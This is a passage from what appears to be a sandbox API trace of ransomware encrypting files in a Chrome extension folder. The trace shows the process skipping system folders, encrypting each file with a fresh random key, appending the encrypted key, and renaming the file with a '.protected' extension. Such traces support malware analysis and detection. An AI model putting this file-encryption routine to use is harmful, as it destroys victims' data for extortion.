[0078.586] lstrcmpiW (lpString1="main.html", 
lpString2="Windows") returned -1 [0078.586] lstrcmpiW (lpString1="main.html", lpString2="Program Files") returned -1 [0078.586] lstrcmpiW (lpString1="main.html", lpString2="Program Files (x86)") returned -1 [0078.586] lstrcmpiW (lpString1="main.html", lpString2="$Recycle.bin") returned 1 [0078.586] lstrcmpiW (lpString1="main.html", lpString2="System Volume Information") returned -1 [0078.586] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html") returned 139 [0078.586] StrStrIW (lpFirst="main.html", lpSrch=".protected") returned 0x0 [0078.586] lstrcmpW (lpString1="main.html", lpString2="RESTORE_FILES.txt") returned -1 [0078.586] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.586] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.587] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html") returned 139 [0078.587] StrStrW (lpFirst="main.html", lpSrch=".txt") returned 0x0 [0078.587] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html") returned 139 [0078.587] StrStrW (lpFirst="main.html", lpSrch=".rar") returned 0x0 [0078.587] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html") returned 139 [0078.587] StrStrW (lpFirst="main.html", lpSrch=".zip") returned 0x0 [0078.587] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5c, lpOverlapped=0x0) returned 1 [0078.588] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffffa4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.588] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5c, lpOverlapped=0x0) returned 1 [0078.588] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.589] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.589] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.589] CloseHandle (hObject=0x160) returned 1 [0078.589] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.protected") returned 149 [0078.589] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.protected")) returned 1 [0078.589] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.589] lstrcmpiW (lpString1="main.js", lpString2="Windows") returned -1 [0078.589] lstrcmpiW (lpString1="main.js", lpString2="Program Files") returned -1 [0078.590] lstrcmpiW (lpString1="main.js", lpString2="Program Files (x86)") returned -1 [0078.590] lstrcmpiW (lpString1="main.js", lpString2="$Recycle.bin") returned 1 [0078.590] lstrcmpiW (lpString1="main.js", lpString2="System Volume Information") returned -1 [0078.590] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js") returned 137 [0078.590] StrStrIW (lpFirst="main.js", lpSrch=".protected") returned 0x0 [0078.590] lstrcmpW (lpString1="main.js", lpString2="RESTORE_FILES.txt") returned -1 [0078.590] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.590] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js") returned 137 [0078.591] StrStrW (lpFirst="main.js", lpSrch=".txt") returned 0x0 [0078.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js") returned 137 [0078.591] StrStrW (lpFirst="main.js", lpSrch=".rar") returned 0x0 [0078.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js") returned 137 [0078.591] StrStrW (lpFirst="main.js", lpSrch=".zip") returned 0x0 [0078.591] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5f, lpOverlapped=0x0) returned 1 [0078.592] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffffa1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.592] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, 
lpNumberOfBytesWritten=0x295ddf4*=0x5f, lpOverlapped=0x0) returned 1 [0078.592] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.592] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.592] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.592] CloseHandle (hObject=0x160) returned 1 [0078.592] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.protected") returned 147 [0078.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.protected")) returned 1 [0078.593] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.593] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0078.593] lstrcmpiW (lpString1="manifest.json", lpString2="Program 
Files") returned -1 [0078.593] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0078.593] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0078.593] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0078.593] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json") returned 143 [0078.593] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0078.593] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.593] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.593] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.594] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json") returned 143 [0078.594] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0078.594] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json") returned 143 [0078.594] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0078.594] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json") returned 143 [0078.594] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0078.594] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2d5, lpOverlapped=0x0) returned 1 [0078.596] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffd2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.596] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2d5, lpOverlapped=0x0) returned 1 [0078.596] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.596] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.596] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.596] CloseHandle (hObject=0x160) returned 1 [0078.596] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.protected") returned 153 [0078.596] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.protected")) returned 1 [0078.597] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.597] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0078.597] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0078.597] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0078.597] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0078.597] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0078.597] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 138 [0078.597] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0078.597] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0078.597] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*") returned 140 [0078.597] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0078.599] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.599] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.599] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.599] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.599] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.599] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\.") returned 140 [0078.599] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.599] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.600] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.600] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.600] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.600] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.600] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.600] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\..") returned 141 [0078.600] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.600] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0078.600] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.600] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0078.600] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0078.600] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0078.600] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0078.600] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0078.600] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned 141 [0078.600] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0078.600] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0078.600] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*") returned 143 [0078.600] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.601] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.601] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.601] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.601] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.601] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.601] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\.") returned 143 [0078.601] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.601] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.601] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.601] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.601] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.601] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.601] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.601] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\..") returned 144 [0078.601] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.601] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.601] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.601] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.601] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.601] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.601] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.601] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.601] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.601] StrStrIW 
(lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.601] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.601] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.601] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.602] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.602] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.602] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.602] ReadFile (in: hFile=0x168, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295d914*=0x101, lpOverlapped=0x0) returned 1 [0078.603] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.603] WriteFile (in: hFile=0x168, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295d914*=0x101, lpOverlapped=0x0) returned 1 [0078.603] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.603] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.603] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.604] CloseHandle (hObject=0x168) returned 1 [0078.604] wnsprintfW (in: pszDest=0xd13138, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 